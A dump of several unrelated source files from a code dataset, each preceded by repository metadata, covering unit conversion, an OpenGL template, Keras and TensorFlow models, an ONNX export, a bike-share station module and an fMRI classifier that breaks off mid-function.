bff3c9da8d2ab379c0f19772bc65509dc5705d4a
|
1607a0ccdac0b507b2b892ced78f6af8a7b33a5d
|
refs/heads/main
| 2023-01-10T18:43:27.623327
| 2020-11-08T20:50:41
| 2020-11-08T20:50:41
| 310,964,744
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 807
|
py
|
# conversions from other unit to meters
DIST_CONVERSIONS = {
"m": 1.0,
"meter": 1.0,
"km": 1000.0,
"kilometer": 1000.0,
"mi": 1609.34,
"mile": 1609.34,
"foot": 0.3048,
"ft": 0.3048,
}
# conversions from other unit to seconds
TIME_CONVERSIONS = {
"s": 1.0,
"sec": 1.0,
"second": 1.0,
"m": 60.0,
"min": 60.0,
"minute": 60.0,
"hour": 3600.0,
"hr": 3600.0,
"h": 3600.0,
"day": 24 * 3600.0,
"d": 24 * 3600.0,
}
# this is the mean Earth radius (the polar radius would be ~6357 km)
EARTH_RADIUS_KM = 6371.0
def convert_dist_units(qty, like="meter", to="km"):
qty = (qty * DIST_CONVERSIONS[like]) / DIST_CONVERSIONS[to]
return qty
def convert_time_units(qty, like="sec", to="min"):
qty = (qty * TIME_CONVERSIONS[like]) / TIME_CONVERSIONS[to]
return qty
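# Usage sketch; the numbers follow directly from the conversion tables above:
#   convert_dist_units(5, like="mile", to="km")    -> 5 * 1609.34 / 1000 = 8.0467
#   convert_time_units(90, like="min", to="hour")  -> 90 * 60 / 3600 = 1.5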
|
[
"2.71828cotner@gmail.com"
] |
2.71828cotner@gmail.com
|
ec32a036831fdab1872f15cd6d75526fec6d9151
|
8a025c88c554c782885ccf780faf7af51f8d2583
|
/OPP1/第七章/attribute_critter.py
|
250670abc900ab0ed774ea1ec31cbe30cefc3df8
|
[] |
no_license
|
LIGHT1213/PythonStudy
|
cc97a6372d5347229d014fa7fa499ac6af1abd2c
|
b3ac29777e395dee1282d9d422f1f6556cc2b3f6
|
refs/heads/master
| 2020-04-08T14:17:08.773627
| 2018-12-19T10:32:17
| 2018-12-19T10:32:17
| 159,430,245
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 663
|
py
|
# Attribute Critter
# Demonstrates creating and accessing object attributes
class Critter(object):
"""A virtual pet"""
def __init__(self, name):
print("A new critter has been born!")
self.name = name
def __str__(self):
rep = "Critter object\n"
rep += "name: " + self.name + "\n"
return rep
def talk(self):
print("Hi. I'm", self.name, "\n")
# main
crit1 = Critter("Poochie")
crit1.talk()
crit2 = Critter("Randolph")
crit2.talk()
print("Printing crit1:")
print(crit1)
crit1.name='anyway'
print("Directly accessing crit1.name:")
print(crit1.name)
input("\n\nPress the enter key to exit.")
|
[
"pch19980807@gmail.com"
] |
pch19980807@gmail.com
|
05178c520e2297e124911065079f0a33449649a3
|
0ec57662afc11226cba79945d11c1a1c46291653
|
/r2d2/chat_conf.py
|
1984267220a12c59f4af400d55b8fe95f05fb152
|
[] |
no_license
|
rudeak/r2d2
|
3fdb6462b35704d89507750de8140bc31b32c1c8
|
7a821fd92fdf742f529923f5b4a5c6b9ec71f429
|
refs/heads/master
| 2021-08-26T09:11:43.605522
| 2017-11-22T18:17:00
| 2017-11-22T18:17:00
| 111,716,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
def max_anagram(bot, msg, db):
cursor = db.cursor()
s = msg['text']
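    # keep everything from the last space onwards, i.e. the final word of the message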
s = s[s.rindex(' '):]
bot.sendMessage(msg['chat']['id'], s)
|
[
"rudeak@gmail.com"
] |
rudeak@gmail.com
|
e1d148caa0658caacdd4b167e3de28a3dbcb7a98
|
382f4ac6b926ff67caef6d4dcb3a6f42f89f5e17
|
/plantilla/PlantillaOpenGL.py
|
7385416d19a4dfd18d935dfc31916486d82f4f55
|
[] |
no_license
|
JenniD5/OpenGL_2021
|
92edeb50a3e55ddfd7e94da717dca76a03fa55de
|
4908032a92df43f8d6fc37876ba53d9ef5626c4a
|
refs/heads/main
| 2023-03-27T04:53:44.456894
| 2021-03-23T00:58:21
| 2021-03-23T00:58:21
| 331,414,502
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,914
|
py
|
from OpenGL.GL import *
from glew_wish import *
import glfw
def dibujar():
    #drawing routines
glBegin(GL_TRIANGLES)
glEnd()
def main():
    #initialise glfw
    if not glfw.init():
        return
    #create the window,
    # regardless of the OS we are running on
    window = glfw.create_window(800,600,"Mi ventana", None, None)
    #configure OpenGL
    glfw.window_hint(glfw.SAMPLES, 4)
    glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR,3)
    glfw.window_hint(glfw.CONTEXT_VERSION_MINOR,3)
    glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL_TRUE)
    glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)
    #make sure the window was actually created
    if not window:
        glfw.terminate()
        return
    #make the context current
    glfw.make_context_current(window)
    #enable validation of
    # modern OpenGL functions
    glewExperimental = True
    #initialise GLEW
    if glewInit() != GLEW_OK:
        print("Could not initialise GLEW")
        return
    #query the OpenGL and shading language versions
    version = glGetString(GL_VERSION)
    print(version)
    version_shaders = glGetString(GL_SHADING_LANGUAGE_VERSION)
    print(version_shaders)
    while not glfw.window_should_close(window):
        #set the drawing region (viewport)
        glViewport(0,0,800,600)
        #set the clear colour
        glClearColor(0.4,0.8,0.1,1)
        #clear the window contents
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
        #draw
        dibujar()
        #poll for peripheral input
        #(keyboard, mouse, game pad, etc.)
        glfw.poll_events()
        #swap the buffers
        glfw.swap_buffers(window)
    #destroy the window to free memory
    glfw.destroy_window(window)
    #shut down the processes started by glfw.init
glfw.terminate()
if __name__ == "__main__":
main()
|
[
"elizabethduran0105@gmail.com"
] |
elizabethduran0105@gmail.com
|
507f90af98c2413e61c6c3d89b3dc702537d22d1
|
0689512293c47123f0e880fd903a695684680857
|
/experiment_code/lstm_m3.py
|
2cc452d6adce419503241087669bf04a5cfd2c89
|
[] |
no_license
|
oldregan/aml_final_project
|
a2628681f8dd23c1ca96a851f54e9f99b00bdfcb
|
cfb49549c8aa84f854e5d280fa618713b94721c9
|
refs/heads/master
| 2021-01-25T10:21:32.898292
| 2018-02-28T22:21:31
| 2018-02-28T22:21:31
| 123,348,966
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,243
|
py
|
import numpy as np
import tensorflow as tf
import keras as kr
import pandas as pd
from sklearn.model_selection import train_test_split
# load keras packages
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
from keras.layers import Conv2D
from keras.layers import MaxPooling1D, LSTM, BatchNormalization, GlobalAveragePooling1D
from keras.datasets import imdb
from keras import optimizers
from keras.callbacks import TensorBoard
from keras import backend as K
def r2_keras(y_true, y_pred):
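    # Coefficient of determination: R^2 = 1 - SS_res / SS_tot; K.epsilon()
    # guards against division by zero when the targets are constant.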
SS_res = K.sum(K.square(y_true - y_pred))
SS_tot = K.sum(K.square(y_true - K.mean(y_true)))
return (1 - SS_res / (SS_tot + K.epsilon()))
# unzip all the data into futuredata folder
futuredata = pd.read_csv('futuredata/beanpulp_day.csv')
window_width = 30
len_horizon = 3
stride = 3
batch_size = 300
epochs = 1000
filters = 20
kernel_size = 4
x_all = []
y_all = []
for i in range(0, futuredata.shape[0] - window_width - len_horizon, stride):
# for i in range(0, 100, stride):
tmp_x = futuredata.loc[i:(i + window_width - 1),
['open', 'close', 'high', 'low', 'volume']]
x_all.append(np.log(tmp_x.close.values / tmp_x.open.values))
tmp_y = futuredata.loc[(i + window_width),
['open', 'close', 'high', 'low']]
flag_bar = np.log(tmp_y['close'] / tmp_y['open'])
y_all.append(flag_bar)
print(i)
x_all_np = np.array(x_all)
x_all_np = np.expand_dims(x_all_np, axis=2)
y_all_np = np.array(y_all)
x_train, x_test, y_train, y_test = train_test_split(
x_all_np, y_all_np, test_size=0.1, random_state=100)
model = Sequential()
# LSTM
model.add(LSTM(8, return_sequences=False, input_shape=(window_width, 1)))
# model.add(GlobalAveragePooling1D())
model.add(Dense(1))
model.summary()
#model.compile(loss='mean_squared_error', optimizer='rmsprop', metrics=['mae'])
model.compile(loss='mean_squared_error',
optimizer='rmsprop', metrics=[r2_keras])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(x_test, y_test))
|
[
"renmin0424@gmail.com"
] |
renmin0424@gmail.com
|
594dbb31b0d629c64a673c8ac53bf5da344c901d
|
201b528383548ec9e4cdea8d92fe42566b03d9f2
|
/Z_7-1.py
|
08064964037cabfb6a81ef88fea0c7f095137192
|
[] |
no_license
|
INePro/Projrct
|
7963fdb1afc02f293e42770718fa759981a9524a
|
896d389b95eeddc6bff84740950f83ba9024b74e
|
refs/heads/master
| 2023-05-21T18:25:32.142853
| 2021-06-12T11:25:17
| 2021-06-12T11:25:17
| 376,272,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
py
|
# run forever
while True:
    # guard against bad input
    try:
        # read the values into variables
        n = int(input("What distance does the car cover in a day: "))
        m = int(input("What distance does the car need to travel: "))
        Time = m / n
        print("The car needs", Time, "day(s)")
    # print a hint on invalid input
    except ValueError:
        print("You need to enter a whole number")
|
[
"starikov.vitaliy.03@bk.ru"
] |
starikov.vitaliy.03@bk.ru
|
c799ae912f28a196e49bada2acad57ee6f99323e
|
f0e9e10d2b2b60d820ea2184fda449d79a2d6550
|
/basic_classification.py
|
da4b580a3f9fa9c898f82f96a696fd88b4dc7569
|
[] |
no_license
|
Pasenger/tensorflow-tutorials
|
da1256fc7e493a464e1e10a36a6269300c459110
|
a7a3cb04acddb27f5747d42bf4942370bef26f7f
|
refs/heads/master
| 2020-05-03T14:55:38.214282
| 2019-04-05T13:22:25
| 2019-04-05T13:22:25
| 178,691,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,773
|
py
|
# -*-conding:utf-8 -*-
# =====================================
# Basic classification
# https://tensorflow.google.cn/tutorials/keras/basic_classification
# =====================================
# Tensorflow and tf.keras
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
print(tf.__version__)
# Import the Fashion MNIST dataset; it is downloaded to C:\Users\Pasenger\.keras\datasets\fashion-mnist
fashion_mnist = keras.datasets.fashion_mnist
# Loading the dataset returns four NumPy arrays:
# training set: train_images, train_labels
# test set: test_images, test_labels
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
# Each image is mapped to a single label
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
print(train_images.shape)
# (60000, 28, 28)
print(test_images.shape)
# (10000, 28, 28)
# Preprocess the data
plt.figure()
plt.imshow(train_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
# Images are 28 x 28 pixels with values in the range 0-255
# Scale these values to 0-1 before feeding them to the neural network: cast the pixel values from integers to floats and divide by 255.
train_images = train_images / 255.0
test_images = test_images / 255.0
plt.figure()
plt.imshow(train_images[0])
plt.colorbar()
plt.grid(False)
plt.show()
plt.figure(figsize=(10, 10))
for i in range(25):
plt.subplot(5, 5, i + 1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(train_images[i], cmap=plt.cm.binary)
plt.xlabel(class_names[train_labels[i]])
plt.show()
# Build the model
# Set up the layers
# The basic building block of a neural network is the layer. Layers extract representations from the data fed into them, and hopefully those representations are useful for the problem at hand.
# Most of deep learning consists of chaining together simple layers; most layers have parameters that are learned during training.
model = keras.Sequential([
    # First layer: reformats the images from a 2D array (28 * 28 pixels) to a 1D array (28 * 28 = 784 pixels)
    # Think of it as unstacking rows of pixels in the image and lining them up.
    # It has no parameters to learn; it only reformats the data (flattening).
    keras.layers.Flatten(input_shape=(28, 28)),
    # First Dense layer: 128 nodes (neurons)
    keras.layers.Dense(128, activation=tf.nn.relu),
    # Second Dense layer: a 10-node softmax layer returning an array of 10 probability scores that sum to 1,
    # i.e. the probability that the current image belongs to each of the 10 classes
    keras.layers.Dense(10, activation=tf.nn.softmax)
])
# Compile the model
# A few more settings are needed before the model is ready for training:
# Loss function: measures how accurate the model is during training.
# Optimizer: how the model is updated based on the data it sees and its loss function
# Metrics: used to monitor the training and testing steps
model.compile(
optimizer=tf.train.AdamOptimizer(),
loss='sparse_categorical_crossentropy',
metrics=['accuracy']
)
# Train the model
# Training the model requires the following steps:
# 1. Feed the training data to the model, here the train_images and train_labels arrays
# 2. The model learns to associate images with labels
# 3. Ask the model to make predictions on the test set, here test_images, and check the predictions against the labels in test_labels
# To start training, call model.fit so that the model "fits" to the training data
model.fit(train_images, train_labels, epochs=5)
# Evaluate accuracy
test_loss, test_acc = model.evaluate(test_images, test_labels)
print('Test accuracy: ', test_acc)
# The accuracy on the test dataset turns out to be a little lower than on the training dataset.
# This gap between training accuracy and test accuracy is a sign of overfitting.
# Overfitting is when a machine learning model performs worse on new data than on its training data.
# Make predictions
# With the model trained, we can use it to make predictions about some images
predictions = model.predict(test_images)
# Look at the first prediction
print(predictions[0])
# Find the label with the highest confidence
print('Predicted:', np.argmax(predictions[0]))
print('Actual:', test_labels[0])
# Plot the predictions to inspect all 10 class channels
def plot_image(i, predictions_array, true_label, img):
predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
plt.imshow(img, cmap=plt.cm.binary)
predicted_label = np.argmax(predictions_array)
if predicted_label == true_label:
color = 'blue'
else:
color = 'red'
plt.xlabel("P:{} {:2.0f}% (T:{})".format(
class_names[predicted_label],
100 * np.max(predictions_array),
class_names[true_label]
), color=color)
def plot_value_array(i, predictions_array, true_label):
predictions_array, true_label = predictions_array[i], true_label[i]
plt.grid(False)
plt.xticks([])
plt.yticks([])
thisplot = plt.bar(range(10), predictions_array, color="#777777")
plt.ylim([0, 1])
predicted_label = np.argmax(predictions_array)
thisplot[predicted_label].set_color('red')
thisplot[true_label].set_color('blue')
# Image 0
i = 0
plt.figure(figsize=(6, 3))
plt.subplot(1, 2, 1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1, 2, 2)
plot_value_array(i, predictions, test_labels)
i = 12
plt.figure(figsize=(6, 3))
plt.subplot(1, 2, 1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(1, 2, 2)
plot_value_array(i, predictions, test_labels)
plt.show()
# Plot the first X test images, their predicted label, and the true label
# Color correct predictions in blue, incorrect predictions in red
num_rows = 5
num_cols = 3
num_images = num_rows * num_cols
plt.figure(figsize=(2 * 2 * num_cols, 2 * num_rows))
for i in range(num_images):
plt.subplot(num_rows, 2 * num_cols, 2 * i + 1)
plot_image(i, predictions, test_labels, test_images)
plt.subplot(num_rows, 2 * num_cols, 2 * i + 2)
plot_value_array(i, predictions, test_labels)
plt.show()
# Use the trained model to make a prediction about a single image
# tf.keras models are optimized to make predictions on a batch (collection) of examples at once, so even a single image has to be wrapped in a list:
img = test_images[0]
img = (np.expand_dims(img, 0))
predictions_single = model.predict(img)
print('Prediction: ', predictions_single)
print('Predicted label:', np.argmax(predictions_single[0]))
plot_value_array(0, predictions_single, test_labels)
_ = plt.xticks(range(10), class_names, rotation=45)
|
[
"pasenger@163.com"
] |
pasenger@163.com
|
0b52aac1d9e5125479b4c19167f891026dc3bac0
|
df5096d59715c1a299a0389e249721d8bdf58927
|
/test/test_basic.py
|
cb9a73b58dcd315bb577366be7c9642ccca74e65
|
[] |
no_license
|
tomektester/test
|
d54f65f059fb861abda578ab7fc474b05290147a
|
a345ec99f6322c6bd1be8fc6fbc8c47004665cc4
|
refs/heads/master
| 2021-01-21T13:36:49.578450
| 2013-02-21T00:24:40
| 2013-02-21T00:24:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
import unittest
class BasicTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_1(self):
self.assertEqual(1,1)
def test_2(self):
self.assertEqual(2,2)
|
[
"tomek.rej@roamz.com"
] |
tomek.rej@roamz.com
|
cde71d39be2ed5096c0281a31c80792286949fab
|
65f3ac35a9bc700c6a5d54d14256322413285429
|
/model_transfer/model2onnx_batch.py
|
3baa3e710c413421dcf73a7c1c489b76a9d1d5c4
|
[] |
no_license
|
yangyubuaa/Web_Server_For_TFServing
|
08d4c0ee92302d1b9e511b384909fce2f5078e52
|
c50189a7372c3369ae00b63e33e01b98f119a7a1
|
refs/heads/master
| 2023-06-11T00:02:38.497914
| 2021-07-06T06:51:59
| 2021-07-06T06:51:59
| 382,998,472
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,545
|
py
|
import torch
from transformers import AlbertForSequenceClassification, BertTokenizer
def torchmodel2onnx():
    # set the batch size and the maximum input length
Batch_size = 1
seg_length = 64
    # load the trained model
model_path = "albert_tiny_pytorch"
albert_model = AlbertForSequenceClassification.from_pretrained(model_path)
    # put the model in eval mode
albert_model.eval()
    # build dummy (zero-filled) model inputs
dummy_input0 = torch.zeros(Batch_size, seg_length).long()
dummy_input1 = torch.zeros(Batch_size, seg_length).long()
dummy_input2 = torch.zeros(Batch_size, seg_length).long()
    # export the PyTorch model to ONNX format
torch.onnx.export(albert_model,
(dummy_input0, dummy_input1, dummy_input2),
"output.onnx",
input_names=["input_ids", "token_type_ids", "attention_mask"],
output_names=["loss", "logits", "hidden_states", "attentions"],
dynamic_axes = {'input_ids' : {0 : 'batch_size'},
'token_type_ids' : {0 : 'batch_size'},
'attention_mask' : {0 : 'batch_size'},
'loss' : {0 : 'batch_size'},
'logits' : {0 : 'batch_size'},
'hidden_states' : {0 : 'batch_size'},
'attentions' : {0 : 'batch_size'}},
opset_version=12)
if __name__ == '__main__':
torchmodel2onnx()
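# A possible follow-up check (not part of the original script): the exported
# file can be loaded back with onnxruntime and fed matching dummy tensors, e.g.
#   import numpy as np
#   import onnxruntime as ort
#   sess = ort.InferenceSession("output.onnx")
#   feeds = {name: np.zeros((1, 64), dtype=np.int64)
#            for name in ("input_ids", "token_type_ids", "attention_mask")}
#   outputs = sess.run(None, feeds)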
|
[
"minghaiyan@sogou-inc.com"
] |
minghaiyan@sogou-inc.com
|
8933aa2068fbd93ab8574d7b2cc34be3417a4673
|
701a5781a31207a248caa93e267a8e43c9dba48a
|
/gbfs/gbfs.py
|
266334ee44a2f4f71c65eefbc4bc3e394ef0b5a0
|
[
"BSD-2-Clause"
] |
permissive
|
jdswinbank/gbfs
|
1160f6bb5bbf798b40369efb9f0bc6d701c86a42
|
5c4a44da1e4ab404d3ad08dad31fe3ae88edd478
|
refs/heads/master
| 2016-09-14T07:07:14.495828
| 2016-05-02T02:10:24
| 2016-05-02T02:10:24
| 57,861,182
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,783
|
py
|
import enum
import json
import math
import time
from collections import namedtuple
#import requests
__all__ = ["Position", "haversine", "EARTH_RADIUS", "StationCollection",
"Station", "RentalMethod"]
EARTH_RADIUS = 6371.0 # km
class RentalMethod(enum.Enum):
"""
All possible rental methods in standard as of 2016-05-01.
"""
# This may be gratuitous: additional methods can be added in future, so
# locking down the enumeration will just cause breakage. Useful for
# sanity checking for now, though.
KEY = 0
CREDITCARD = 1
PAYPASS = 2
APPLEPAY = 3
ANDROIDPAY = 4
TRANSITCARD = 5
ACCOUNTNUMBER = 6
PHONE = 7
# Angles measured in degrees
Position = namedtuple('Position', ['lon', 'lat'])
def haversine(pos1, pos2):
# https://en.wikipedia.org/wiki/Haversine_formula
delta_lat = math.radians(pos2.lat - pos1.lat)
delta_lon = math.radians(pos2.lon - pos1.lon)
return EARTH_RADIUS * 2 * math.asin(math.sqrt(math.sin(delta_lat/2)**2
+ math.cos(math.radians(pos1.lat))
* math.cos(math.radians(pos2.lat))
* math.sin(delta_lon/2)**2))
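# Quick sanity check: one degree of longitude along the equator is about
# 2 * pi * EARTH_RADIUS / 360 ~ 111.2 km, so
#   haversine(Position(lon=0.0, lat=0.0), Position(lon=1.0, lat=0.0)) ~ 111.19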
class StationCollection(object):
def __init__(self, ttl, last_updated, stations):
self.ttl = ttl
self.last_updated = last_updated
self.stations = list(stations)
def __getitem__(self, *args, **kwargs):
return self.stations.__getitem__(*args, **kwargs)
def __len__(self):
return len(self.stations)
    def near(self, position, radius=None):
        """
        Find stations near ``position``.
        Returns a list of (station, distance) tuples for all stations within
        ``radius`` km of ``position``, sorted by distance.
        """
        # Compute each distance once, filter by radius, then sort by distance
        # as the docstring promises.
        distances = [(station, haversine(position, station.position))
                     for station in self]
        if radius is not None:
            distances = [(s, d) for s, d in distances if d <= radius]
        return sorted(distances, key=lambda pair: pair[1])
@staticmethod
def from_json(info, status=None):
"""
Parse GBFS-style JSON and return a StationCollecton.
"""
ttl = int(info['ttl'])
last_updated = int(info['last_updated'])
stations = [Station(**data) for data in info['data']['stations']]
collection = StationCollection(ttl, last_updated, stations)
if status:
collection.update_status()
return collection
@property
def valid(self):
"""
Return True if the ``last_updated`` time is more recent than the TTL.
"""
return (time.time() - self.last_updated) <= self.ttl
def get_id(self, station_id):
"""
Return a station with ID ``station_id``, or ``None``.
"""
# Probably StationCollection should actually be a mapping of
# station_id -> station. But it's not at the moment.
for station in self.stations:
if station.station_id == station_id:
return station
return None
class Station(object):
# Optional fields in the GBFS spec, provided as pairs of (field_name,
# callable), where callable is used to cast whatever input is provided to
# an appropriate type.
OPTIONAL_FIELDS = [("short_name", str),
("address", str),
("cross_street", str),
("region_id", str),
("post_code", str),
("rental_methods", lambda x: {getattr(RentalMethod, y)
for y in x}),
("capacity", int)]
def __init__(self, station_id, name, lon, lat, **kwargs):
self.station_id = str(station_id)
self.name = str(name)
self.position = Position(float(lon), float(lat))
# All optional fields (ie, as defined in the spec) are set to None if
# they don't exist.
for field_name, field_type in self.OPTIONAL_FIELDS:
try:
value = field_type(kwargs.pop(field_name))
except KeyError:
value = None
setattr(self, field_name, value)
# Fields which aren't defined in the spec are also saved; this is
# relevant for e.g. Citibike's eightd_has_key_dispenser.
for field, value in kwargs.items():
setattr(self, field, value)
# Initialize the station so that relevant attributes are set even if
# the status hasn't yet been retrieved.
self.status = {}
self.push_status(-1, -1, False, False, False, -1)
def push_status(self, num_bikes_available, num_docks_available,
is_installed, is_renting, is_returning, last_reported,
**kwargs):
self.last_reported = int(last_reported)
self.status[self.last_reported] = {
"num_bikes_available": int(num_bikes_available),
"num_docks_available": int(num_docks_available),
"is_installed": bool(is_installed),
"is_renting": bool(is_installed),
"is_returning": bool(is_installed),
}
@property
def age(self):
"""
Return the age of the station status, in seconds.
Or -1 if status information is not available.
"""
if self.last_reported >= 0:
return time.time() - self.last_reported
else:
return -1
def __getattr__(self, attrname):
try:
return self.status[self.last_reported][attrname]
except KeyError:
raise AttributeError(attrname)
def __repr__(self):
return 'Station(%r, %r)' % (self.station_id, self.name)
|
[
"john@swinbank.org"
] |
john@swinbank.org
|
f62dcd6c599826a31e28c742e85d598e3375d3a3
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2224/60677/295560.py
|
f653bfac240a0f0bbc5bd8f5352722c814c3e233
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
# Greedy single swap to maximise the number formed by the input digits:
# find the first position whose digit differs from the digits sorted in
# descending order, then swap it with the largest (right-most) digit after it.
zzh = input()
zzh = list(zzh)
zzh = [int(x) for x in zzh]
zzhbig = zzh.copy()
zzhbig.sort(reverse=True)
length = len(zzh)
first = 0
for i in range(length):
first=i
if zzh[i]!=zzhbig[i]:
break
if first!=length-1:
big=first
for i in range(first+1,length):
if zzh[i]>=zzh[big]:
big=i
swap=zzh[first]
zzh[first]=zzh[big]
zzh[big]=swap
zzh=[str(x) for x in zzh]
print("".join(zzh))
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
39f1958826c911b974880e4fe9300acc47ed4602
|
1109202b193ab1e1e8e38ba08889b4afd020bd54
|
/fMRI.py
|
cbf5ea3c795821469687420b6429fd61f738d0d9
|
[] |
no_license
|
SriganeshNk/fMRI
|
1058499772bd2529bc410aa1e3957c351599dcaa
|
32e2a51001e18b11b3837cdd57a77bba7174b9e3
|
refs/heads/master
| 2021-01-21T05:01:49.417321
| 2015-05-08T23:26:12
| 2015-05-08T23:26:12
| 34,079,485
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,851
|
py
|
__author__ = 'Sriganesh'
import scipy.io
import math
from sklearn import svm
import numpy as np
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from matplotlib import pyplot as plt
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import minimum_spanning_tree
import networkx as nx
import random
from scipy.stats import norm
from sklearn.metrics import accuracy_score
from sklearn.metrics import precision_recall_fscore_support
def loadData(filename):
data = scipy.io.loadmat(filename)
labels, index = getLabels(data['i'])
trials = []
k = 0
for y in data['d']:
if k in index:
k += 1
continue
i = 0
while i < 32:
trials.append(y[0][i])
i += 1
k += 1
return trials, labels
def getLabels(info):
labels = []
indexes = []
i = 0
for x in info[0]:
if x[0][0] == 0 or x[0][0] == 1:
indexes.append(i)
i += 1
continue
if x[len(x)-1][0] == 'P':
for k in range(0,16):
labels.append('P')
for k in range(0,16):
labels.append('S')
else:
for k in range(0,16):
labels.append('S')
for k in range(0,16):
labels.append('P')
i += 1
return labels, indexes
def cross_validate(traindata, trainlabels):
n = 16
i = 0
k_val = [1, 3, 7, 9, 15]
linearSVM, Gauss, knn = [],[],[]
while i < n:
train, tlabel, test, label = CVsplit(traindata,trainlabels, i)
L = []
clf = svm.SVC(C=5000, kernel='linear')
L.append(fitAndPredict(clf,train,tlabel,test,label))
linearSVM.append(L)
clf = GaussianNB()
Gauss.append(fitAndPredict(clf,train,tlabel,test,label))
L = []
for j in k_val:
if j < len(train[0]):
clf = KNeighborsClassifier(n_neighbors=j)
L.append(fitAndPredict(clf,train,tlabel,test,label))
if len(L) > 0:
knn.append(L)
i += 1
line1, = plt.plot(linearSVM, label= "SVM with C=5000")
line2, = plt.plot(Gauss, label= "Gaussian")
X = np.asarray(knn)
line3, leg3 = [line1, line2], ["SVM with C=5000","Gaussian"]
for i in range(len(knn[0])):
line, = plt.plot(X[:,i], label = str(k_val[i])+"nn")
line3.append(line)
leg3.append(str(k_val[i])+"nn")
plt.legend(line3,leg3)
plt.show()
def fitAndPredict(clf, traindata, trainlabels, testdata, testlabels):
clf.fit(traindata, trainlabels)
i , correct = 0, 0
for x in testdata:
if testlabels[i] == clf.predict(x):
correct += 1
i += 1
return float(correct)/float(len(testlabels))
def shuffle(data, labels):
start = len(data) - (6*len(data)/10)
end = len(data) - (5*len(data)/10)
x = [i for i in range(len(data))]
random.shuffle(x)
traindata = [data[i] for i in x[:start]]
traindata.extend([data[i] for i in x[end:]])
trainlabels = [labels[i] for i in x[:start]]
trainlabels.extend([labels[i] for i in x[end:]])
testdata = [data[i] for i in x[start:end]]
testlabels = [labels[i] for i in x[start:end]]
return (traindata,trainlabels,testdata,testlabels)
def trainAndtest(traindata, trainlabels, testdata, testlabels):
clf = svm.SVC(C=5000,kernel="linear")
linearSVM = fitAndPredict(clf, traindata, trainlabels,testdata, testlabels)
Gauss = GaussianNB()
Gaussian = fitAndPredict(Gauss, traindata, trainlabels,testdata, testlabels)
neigh = KNeighborsClassifier(n_neighbors=7)
knn = fitAndPredict(neigh, traindata, trainlabels,testdata, testlabels)
print "Test accuracies:"
print "SVM:", linearSVM
print "GNB:", Gaussian
print "KNN:", knn
def getClassConditionalData(data, labels):
dataP, dataS = [], []
for i in range(len(data)):
if labels[i] == 'P':
dataP.append(data[i])#[j] for j in range(len(data[i]))])
if labels[i] == 'S':
dataS.append(data[i])#[j] for j in range(len(data[i]))])
dataP = np.transpose(dataP)
dataS = np.transpose(dataS)
return dataP, dataS
def getClassProbability(labels):
s, p = 0, 0
for x in labels:
if x == 'S':
s += 1
if x == 'P':
p += 1
Pp = float(p)/float(len(labels))
Ps = float(s)/float(len(labels))
return Pp, Ps
def getParam(data):
Params = []
for x in data:
Mu = np.mean(x)
Sigma = np.var(x)
Params.append((Mu, Sigma))
return Params
def CVsplit(traindata, trainlabels, i=5):
n = 16
limit = len(traindata)/n
start = i * limit
end = (i+1) * limit
if start == 0:
train = traindata[end:]
tlabel = trainlabels[end:]
if end == len(traindata):
train = traindata[:start]
tlabel = trainlabels[:start]
if start != 0 and end != len(traindata):
train = traindata[:start]
train.extend(traindata[end:])
tlabel = trainlabels[:start]
tlabel.extend(trainlabels[end:])
test = traindata[start:end]
label = trainlabels[start:end]
return train,tlabel,test,label
def learnStructure(dataP, dataS, Pp, Ps, R = 0.005):
tempMatrix = [[0 for i in range(len(dataP))] for j in range(len(dataP))]
for i in range(len(dataP)):
for j in range(i+1, len(dataP)):
try:
temp = Pp * math.log(1-((np.corrcoef(dataP[i], dataP[j])[0][1] - R)**2))
temp += Ps * math.log(1-((np.corrcoef(dataS[i], dataS[j])[0][1] - R)**2))
temp *= (0.5)
tempMatrix[i][j] = temp
except ValueError:
print "DATA1:", dataP[i]
print "DATA2:", dataP[j]
print "Correlation coefficient:", np.corrcoef(dataP[i], dataP[j])[0][1]
#print tempMatrix
